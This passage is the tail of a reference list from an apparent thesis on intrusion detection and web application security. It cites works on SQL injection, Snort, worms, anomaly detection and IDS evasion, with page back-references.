routine, BBC News, Silicon valley ⇒ web link (accessed January 2010) 12

[Shoch and Hupp (1982)] Shoch, J.F., Hupp J.A. (1982). The Worm Programs –
Early Experience with a Distributed Computation, Communications of the ACM,
vol. 25(3), pp. 172-180. ⇒ web link (accessed January 2010) 9

[Snort] Sourcefire. SNORT: Open source network intrusion detection system, ⇒ web
link (accessed January 2010) 60, 104, 117

[Sourcefire IPS] Sourcefire, Inc., Intrusion Prevention System ⇒ web link (accessed
January 2010) 5

[Spett (2002)] Spett, K. (2002). SQL Injection: Are Your Web Applications Vulner-
able?, A White Paper from SPI Dynamics ⇒ web link (accessed January 2010)
58, 84

[L0t3k] L0t3k, SQL Injection: The Complete Documentation ⇒ web link (accessed
January 2010) 60, 84

[Stephenson and Sikdar (2006)] Stephenson, B., Sikdar, B., (2006). A Quasi-species
Approach for Modeling the Dynamics of Polymorphic Worms. 25th IEEE Inter-
national Conference on Computer Communications, INFOCOM. 118

[Symantec (2006)] Symantec (2006). HTTP Smuggle Get Content Length, attack
signature ⇒ web link (accessed January 2010) 84

[Symantec (2009)] Symantec Internet Security Threat Report Finds Malicious Ac-
tivity Continues to Grow at a Record Pace. ⇒ web link (accessed January 2010)
12

[Tandon et al. (2004)] Tandon, G., Chan, P., Mitra, D. (2004). Data Cleaning
and Enriched Representations for Anomaly Detection in System Calls. Machine
Learning and Data Mining for Computer Security, Springer London, 137-156.
105

[Tao et al. (2006)] Tao, D., Tang, X., Li, X., Wu, X., (2006). Asymmetric Bagging
and Random Subspace for Support Vector Machines-Based Relevance Feedback
in Image Retrieval. IEEE Transactions on Pattern Analysis and Machine Intel-
ligence, 28(7), 1088-1099. 108

[Torrano et al. (2009)] Torrano-Gimenez, C., Perez-Villegas, A., Alvarez, G.
(2009). A Self-learning Anomaly-Based Web Application Firewall, In Com-
putational Intelligence in Security for Information Systems, Springer Berlin Hei-
delberg. 62, 63, 64

[TippingPoint IPS] TippingPoint Technologies, Inc., Intrusion Prevention Systems


⇒ web link (accessed January 2010) 5

[Valeur (2006)] Valeur, F., Vigna, G., Kruegel, C., Kirda, E. (2006). An Anomaly-
driven Reverse Proxy for Web Applications, Proceedings of the ACM Symposium
on Applied Computing (SAC), Dijon, France, ACM. 85

[Valiant (1985)] Valiant, L.G., (1985). A theory of the learnable. ACM, 1985. 111

[Vigna et al. (2004)] Vigna, G., Robertson, W., Balzarotti, D. (2004). Testing
Network-based Intrusion Detection Signatures Using Mutant Exploits, ACM Con-
ference on Computer and Communications Security, 21-30. 117

[Vigna et al. (2005)] Vigna, G., Robertson, W., Balzarotti, D. (2005). Testing
network-based intrusion detection signatures using mutant exploits, In ACM Con-
ference on Computer and Communications Security, pp. 21-30. 60

[Wagner and Soto (2002)] Wagner, D., Soto, P., (2002). Mimicry Attacks on Host-
Based Intrusion Detection Systems. ACM, 255-264. 123

[Wang et al. (2004)] Wang, K., Stolfo, S.J. (2004). Anomalous payload-based net-
work intrusion detection. In Proceedings of Recent Advances in Intrusion Detec-
tion (RAID), pp. 203-222. Springer Verlag. 60

[WASC (2010)] Gordeychik, S. (2010). Web Application Security Statistics, The


Web Application Security Consortium ⇒ web link (accessed January 2010) 15,
16, 58

[Yong and Yangsheng (2006)] Yong, G., Yangsheng, W., (2006). Boosting in Ran-
dom Subspaces for Face Recognition. Proceedings of the 18th International Con-
ference on Pattern Recognition, 1, 519-522. 108

[Yurcik (2002)] Yurcik, W., (2002). Controlling Intrusion Detection Systems by


Generating False Positives: Squealing Proof-of-Concept. Proceedings of the 27th
Annual IEEE Conference on Local Computer Networks, IEEE, 134-135. 120

[Zhan et al. (2007)] Zhan, Q., Reeves, D.S., Ning, P., Purushothaman, S. (2007).
Analyzing Network Traffic To Detect Self-Decrypting Exploit Code. Proceedings
of the 2nd ACM symposium on Information, computer and communications
security, ACM, 4-12. 119
